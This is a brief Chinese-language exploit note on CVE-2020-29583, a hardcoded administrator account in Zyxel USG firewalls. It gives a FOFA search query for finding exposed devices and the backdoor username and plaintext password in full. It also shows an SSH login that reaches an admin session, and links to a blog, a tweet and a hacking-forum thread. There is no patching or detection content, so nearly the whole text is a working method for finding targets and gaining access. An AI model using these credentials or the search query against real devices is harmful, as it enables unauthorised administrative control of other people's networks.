Zyxel USG Series 账户硬编码漏洞（CVE-2020-29583）

FOFA:

title="USG40"

Username: zyfwp
Password: PrOw!aN_fXp

该帐户可以同时在SSH和Web界面上使用。

$ ssh zyfwp@192.168.1.252
Password: Pr*******Xp
Router> show users current
No: 1
  Name: zyfwp
  Type: admin
(...)
Router>

ref:

• https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
• https://twitter.com/dozernz/status/1344435468868358145
• https://forum.ywhack.com/thread-114904-1-1.html